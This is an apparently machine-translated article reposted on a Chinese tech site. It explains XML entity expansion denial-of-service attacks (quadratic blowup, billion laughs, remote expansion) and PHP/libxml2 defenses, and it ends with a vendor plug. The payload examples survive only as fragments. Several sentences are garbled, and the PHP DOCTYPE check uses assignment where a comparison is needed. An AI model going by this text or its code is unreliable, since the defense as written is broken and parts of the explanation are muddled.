Shulou(Shulou.com)06/03 Report--

Editor to share with you the example analysis of XML entity extension attacks, I believe that most people do not know much about it, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!

XMl Entity Expansion (attack) is similar to XML Entity Expansion to some extent, but it mainly attempts to carry out DOS attacks by consuming the server environment of the target program. This attack is based on the XML Entity Expansion implementation and is implemented by creating a definition of a custom entity in XML's DOCTYPE. For example, this definition can generate a XML structure in memory that is much larger than the original allowable size of XML, so that this attack can deplete the necessary memory resources for the network server to function properly and effectively. This attack also applies to the XML serialization function module of HTML5, which is not currently recognized as HTML by the libxml2 expansion pack.

An example of XML Entity Expansion

There are several ways to extend XML custom entities to achieve the desired effect of exhausting server resources.

Generic Entity Expansion generic entity extension attack

A generic entity extension attack is also known as "Quadratic Blowup Attack". In this way, a custom entity is defined as an extremely long string. When the entity is heavily used in the file, it expands each time it is called, generating a XML structure that is much larger than the RAM size required by the original XML.

Now include & long; lots of times to expand the in-memory size of this XML structure & long;&long;&long;&long;&long;&long;&long;&long; & long;&long;&long;&long;&long;&long;&long; Keep it going... & long;&long;&long;&long;&long;&long;&long;...

By balancing the size of a custom entity string with the number of entities used within the document body, you can create an XML document or string that expands to the predictable size of the server's RAM space. By occupying the server RAM by repeating the request like this, a successful denial of service attack can be launched. The drawback of this approach is that since the memory consumption effect is based on simple multiplication, the initial XML document or string itself needs to be large enough.

Recursive entity extension attack

The general entity extension attack requires a large enough amount of XML input data, while the average input word energy saving of the recursive entity extension attack produces a more powerful attack effect. This attack relies on the XML parser to parse, thus accomplishing the exponential growth of a small set of entities. Through this exponential explosive growth, a much smaller amount of input data than a generic entity extension attack can actually grow greatly. Therefore, it is also appropriate to call this way "XML Bomb" or "Billion Laughs Attack".

] > Explode in 3...2...1...&boom

XML Bomb attacks do not require large amounts of XML data input that may be restricted by the program. The entity set grows exponentially like this, and the resulting expanded text size is 100 times the original & x0 entity value of 2. This is really a huge and devastating bomb!

Remote entity extension attack

Both regular and recursive entity extension attacks rely on locally defined entities in the XML document type definition, but attackers can also make external entity definitions. This obviously requires that the XML parser be able to make remote HTTP requests as we encountered earlier when describing XML external entity injection attacks (XXE). Rejecting such a request is a basic security measure for your XML parser. Therefore, the measures to defend against XXE attacks are also applicable to this kind of XML entity extension attacks.

Although it can be defended in the above way, the remote entity extension attacks by causing the XML parser to make a remote HTTP request to obtain the extension value of the referenced entity. The returned result will define the external entities that other XML parsers must request separately from HTTP. In this way, some seemingly non-aggressive requests quickly get out of control and put a burden on the resources available to the server. In this case, if the request includes a recursive extension attack, the end result will be even worse.

3..2..1...&cascade

The above attack techniques are also likely to be more circuitous in DOS attacks, such as remote requests being adjusted to local programs or any other program that shares its server resources. This type of attack can lead to self-destructive DOS attacks, where attempts by XML parsers to parse external entities may trigger numerous requests for local programs, thus consuming more server resources. This approach is therefore used to amplify the impact of previously discussed attacks on the use of XML external entity injection attacks (XXE) to complete DOS attacks.

Defensive measures against XML entity extension attacks

The following general defenses are inherited from our defenses against normal XML external entity attacks (XXE). We should deny the parsing of local files and remote HTTP requests by custom entities in XML and reject them using the following functions that apply globally to all extensions written by PHP or XML that use the libxml2 function internally.

Libxml_disable_entity_loader (true)

It is true that PHP is known for playing its cards against common sense, and it does not use conventional defenses. General defense in document type declarations, use XML's document type definition to completely reject the definition of a custom entity. PHP does define an alternative entity's LIBXML_NOENT constant and the DOMDocument::$substituteEntities public property for defense, but the defense effect of using these two definitions is not obvious. It seems that we can only solve the problem in this way, without any better solution.

Although there is no better solution, the libxml2 function does have built-in rejection of recursive entity parsing by default. You know, if something goes wrong with a recursive entity, it can make your error log as red as lighting a Christmas tree. In this way, it doesn't seem necessary to use a special defense against recursive entities, although we have to do something in case the libxml2 function suddenly falls back into the failure of parsing recursive entities.

At present, the new threats mainly come from the rough attacks of Generic Entity Expansion or Quadratic Blowup Attack. This kind of attack does not require calling remote or local systems, nor does it require physical recursion. In fact, the only defense is either not to use XML, or to clean up and filter all XML that contains document type declarations. Unless the required document type declaration is received from a secure trusted source, the safest thing to do is not to use XML. For example, we are accepted by peer-validated HTTPS connections. Otherwise, since PHP doesn't give us the option to disable document type definition, we'll have to build our own logic. Assuming that you can call libxml_disable_entity_loader (TRUE), it is safe for subsequent programs to run, because the entity extension step has been deferred to a time when the node values affected by the extension can be accessed again (however, checking TURE will never be accessible).

$dom = new DOMDocument;$dom- > loadXML ($xml); foreach ($dom- > childNodes as $child) {if ($child- > nodeType = XML_DOCUMENT_TYPE_NODE) {throw new\ InvalidArgumentException ('Invalid XML: Detected use of illegal DOCTYPE');}}

Of course, the above code will only work properly if libxml_disable_entity_loader is set to TRUE, and external entity references will not be parsed when XML is initially loaded. Unless the parser itself has a comprehensive set of control options on how to parse entities, this is probably the only defense when the XML parser does not rely on the libxml2 function for parsing.

If you want to use the SimpleXML function, remember to use the the simplexml_import_dom () function to convert the verified DOMDocument project.

OneAPM for PHP can go deep into all PHP applications to complete application performance management and monitoring, including visibility of code-level performance issues, rapid identification and traceability of performance bottlenecks, real user experience monitoring, server monitoring and end-to-end application performance management.

The above is all the content of the article "sample Analysis of XML entity extension attacks". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.